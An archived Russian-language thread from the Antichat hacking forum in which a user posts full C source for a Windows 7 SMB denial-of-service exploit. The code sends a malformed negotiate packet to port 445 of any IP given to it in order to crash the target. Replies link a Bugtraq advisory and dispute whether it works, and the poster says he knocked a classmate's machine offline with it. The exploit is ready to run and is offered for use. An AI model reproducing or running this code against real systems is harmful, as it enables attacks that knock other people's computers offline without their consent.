Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   С/С++, C#, Delphi, .NET, Asm (https://forum.antichat.xyz/forumdisplay.php?f=24)
-   -   exploit windows 7 (https://forum.antichat.xyz/showthread.php?t=158005)

DeaD_MoroZ 20.11.2009 19:00
exploit windows 7
 
вот он сам
Код:
#include <windows.h>
#include <stdio.h>

#pragma comment(lib, "WS2_32.lib")

char buff[] =
                "\x00\x00\x00\x90"
                "\xff\x53\x4d\x42"
                "\x72\x00\x00\x00"
                "\x00\x18\x53\xc8"
                "\x00\x26"
                "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
                "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
                "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
                "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
                "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
                "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
                "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
                "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
                "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
                "\x30\x30\x32\x00";
               
int main(int argc, char *argv[]) {
       
       
        if (argc < 2) {
                printf("Syntax: %s [ip address]\r\n", argv[0]);
                return -1;
        }
       
        WSADATA WSAdata;
        WSAStartup(MAKEWORD(2, 2), &WSAdata);
       
        SOCKET sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
        char *host = argv[1];
       
     
        SOCKADDR_IN ssin;
        memset(&ssin, 0, sizeof(ssin));
        ssin.sin_family = AF_INET;
        ssin.sin_port = htons((unsigned short)445);
        ssin.sin_addr.s_addr = inet_addr(host);
       
        printf("Connecting to %s:445... ", host);
        if (connect(sock, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) {
                printf("ERROR!\r\n");
                return 0;
        }
        printf("OK\r\n");
       
        printf("Sending malformed packet... ");
        if (send(sock, buff, sizeof(buff), 0) <= 0) {
                printf("ERROR!\r\n");
                return 0;
        }
        printf("OK\r\n");
       
        printf("Successfully sent packet!\r\nTarget should be crashed...\r\n");
       
 
        closesocket(sock);
        WSACleanup();
       
        return 1;
}

VirtuoZ 20.11.2009 19:14
это на дос только? откуда сорс если не секрет? :)

root_sashok 20.11.2009 19:27
Зачем спалил :(

Теперь прикроют.

fker 20.11.2009 19:44
мега превад
http://seclists.org/bugtraq/2009/Sep/56

DeaD_MoroZ 21.11.2009 06:03
Цитата:
Сообщение от root_sashok
Зачем спалил :(

Теперь прикроют.
не прикроют, не могут :D

DeaD_MoroZ 21.11.2009 06:04
Цитата:
Сообщение от fker
мега превад
http://seclists.org/bugtraq/2009/Sep/56
я плохо понял чо ты написал, но если я всё таки правильно понял: Я НА АВТОРСТВО И НЕ ПРЕТЕНДОВАЛ

hamsin 21.11.2009 06:21
Не знаю чего там должно быть.... По идее BDOS, но у меня на двух 7 всё нормально... Как работала, так и продолжает работать... !?

DeaD_MoroZ 21.11.2009 07:56
Цитата:
Сообщение от hamsin
Не знаю чего там должно быть.... По идее BDOS, но у меня на двух 7 всё нормально... Как работала, так и продолжает работать... !?
я на одногрупнике тестил-в даун

hamsin 21.11.2009 08:23
Фиг его... Даже обидно стало... :)

ExitProcess 21.11.2009 08:51
DeaD_MoroZ
Уважаемый, имейте привычку указывать источник, при постах такого рода.


Время: 01:24